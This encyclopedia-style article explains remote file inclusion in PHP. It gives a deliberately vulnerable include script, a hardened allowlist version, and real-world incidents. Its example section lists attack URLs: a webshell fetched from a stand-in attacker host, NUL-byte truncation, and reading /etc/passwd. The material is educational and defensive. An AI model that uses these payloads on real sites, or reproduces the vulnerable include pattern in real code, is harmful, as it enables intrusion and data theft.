Remote file inclusion
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs when user-supplied input is used to build a file path without proper validation. The impact ranges from merely disclosing the contents of a file to, depending on the context, outcomes such as:
- Code execution on the web server
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
- Denial of Service (DoS)
- Data Theft/Manipulation
Programming languages
PHP
In PHP the main cause is the use of unvalidated external variables such as $_GET, $_POST and $_COOKIE with a filesystem function, most notably the include and require statements. Many of these vulnerabilities can be attributed to programmers not being familiar with all of the capabilities of the PHP language. The allow_url_fopen directive, if enabled, allows filesystem functions to accept a URL and retrieve data from remote locations; since PHP 5.2.0, include and require additionally require the allow_url_include directive (Off by default) to be enabled before they will load a URL. An attacker alters a variable that is passed to one of these functions so that it includes malicious code from a remote resource. To mitigate this vulnerability, user input must never be concatenated directly into an include path; it should be validated against an allowlist of expected values before being used.
Example
Consider this PHP script (which includes a file specified by request):
<?php
$color = 'blue';
if (isset($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}
include($color . '.php');
?>

<form method="get">
    <select name="COLOR">
        <option value="red">red</option>
        <option value="blue">blue</option>
    </select>
    <input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But because anyone can supply an arbitrary value for COLOR, it is possible to include code from other files:
- /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - includes a remotely hosted file containing malicious code. The trailing ? turns the appended .php suffix into a query string on the remote request, so the attacker's server serves webshell.txt unchanged.
- /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (a local file inclusion vulnerability).
- /vulnerable.php?COLOR=C:\\notes.txt%00 - uses the NUL meta character to truncate the path and remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled the attack is limited because special characters are escaped, which disables the NUL terminator. PHP 5.3.4 and later reject paths containing a NUL byte in filesystem functions, and magic_quotes_gpc was removed in PHP 5.4.)
- /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
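The following is an added example of a hardened replacement for the COLOR script above; it is not code from the original article. It assumes the two permitted theme files live in a themes/ directory next to the script. Instead of concatenating the request parameter into a path, it maps the parameter through a fixed allowlist, then confirms the resolved path stays inside the expected directory, and finally warns if the allow_url_include directive is enabled.

```php
<?php
// Added example: hardened version of the vulnerable COLOR include.
// Assumption: ./themes/red.php and ./themes/blue.php exist.
declare(strict_types=1);

// 1. Allowlist: the untrusted value only ever selects a key; the user string
//    itself is never concatenated into a filesystem path.
const THEMES = ['red' => 'red.php', 'blue' => 'blue.php'];

function resolveTheme(?string $requested): string
{
    // Unknown, missing, or non-string input falls back to the default theme.
    return THEMES[$requested] ?? THEMES['blue'];
}

$requested = $_GET['COLOR'] ?? null;
$file = resolveTheme(is_string($requested) ? $requested : null);

// 2. Defence in depth: canonicalise and check containment, so that a future
//    mistake in the allowlist cannot reintroduce traversal or NUL tricks.
//    realpath() returns false for a missing file or a path containing NUL.
$baseDir = realpath(__DIR__ . '/themes');
$path = ($baseDir === false) ? false : realpath($baseDir . '/' . $file);
if ($baseDir === false
    || $path === false
    || strncmp($path, $baseDir . DIRECTORY_SEPARATOR, strlen($baseDir) + 1) !== 0) {
    http_response_code(500);
    exit('theme not available');
}

// 3. Configuration check: allow_url_include (PHP >= 5.2) is what lets
//    include/require load a URL; it should be Off in production.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled; remote file inclusion is possible');
}

include $path;
```

The allowlist alone removes the vulnerability; the realpath() containment check and the ini_get() warning are there so that the script fails closed if the allowlist is later edited carelessly or the server configuration drifts.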
Known real-world examples
- In May 2011, Imperva's ADC published a comprehensive description of how RFI works and how to avoid it [1].
- In June 2011, the LulzSec attacks relied heavily on RFI, as described in an Imperva blog post [2].
See also
- Attack (computing)
- Code injection
- Cross-site scripting
- Metasploit Project, an open-source penetration testing tool that includes tests for RFI
- SQL injection
- Threat (computer)
- Vulnerability (computing)
- w3af, an open-source web application security scanner
- Include vulnerability
External links
- Remote File Inclusion Vulnerabilities The Web Application Security Consortium Threat Classification
- Metasploit PHP Remote File Include Generic Exploit
- fimap - a small tool for local and remote file inclusion auditing and exploitation